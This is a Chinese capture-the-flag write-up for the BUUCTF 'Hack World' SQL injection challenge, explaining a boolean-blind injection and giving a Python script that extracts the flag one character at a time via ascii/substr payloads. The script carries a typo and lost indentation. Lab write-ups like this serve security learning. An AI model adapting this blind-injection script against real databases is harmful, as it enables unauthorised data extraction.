BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"

result = ""

for i in range(1, 50):

for j in range(32, 128):

payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"

response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})

{m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。

f response.text.find('girl') == -1:

result += chr(j)

print(j)

break

print("正在输出flag:", result)

print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。

#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。

#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

相关推荐
TOPGUS几秒前
谷歌Chrome浏览器即将对HTTP网站设卡:突出展示“始终使用安全连接”功能
前端·网络·chrome·http·搜索引擎·seo·数字营销
韶关亿宏科技-光纤通信小易3 分钟前
光模块-数字时代的算力传输纽带
大数据·网络
Wadli7 分钟前
项目5 |HTTP服务框架
网络·网络协议·http
fy zs10 分钟前
网络编程套接字
linux·服务器·网络·c++
yuanmenghao10 分钟前
CAN系列 — (8) 为什么 Radar Object List 不适合“直接走 CAN 信号”
网络·数据结构·单片机·嵌入式硬件·自动驾驶·信息与通信
CCPC不拿奖不改名12 分钟前
网络与API:HTTP基础+面试习题
网络·python·网络协议·学习·http·面试·职场和发展
梁辰兴14 分钟前
中国信通院发布《人工智能安全治理研究报告(2025年)》,AI安全攻防为何“易攻难守“?
人工智能·安全·ai·ai安全·梁辰兴·人工智能安全治理·中国信通院
ghostwritten14 分钟前
Kubernetes 网络模式深入解析?
网络·容器·kubernetes
Tao____15 分钟前
企业级物联网平台
java·网络·物联网·mqtt·网络协议
山峰哥17 分钟前
数据库工程与SQL调优实战:从原理到案例的深度解析
java·数据库·sql·oracle·性能优化·编辑器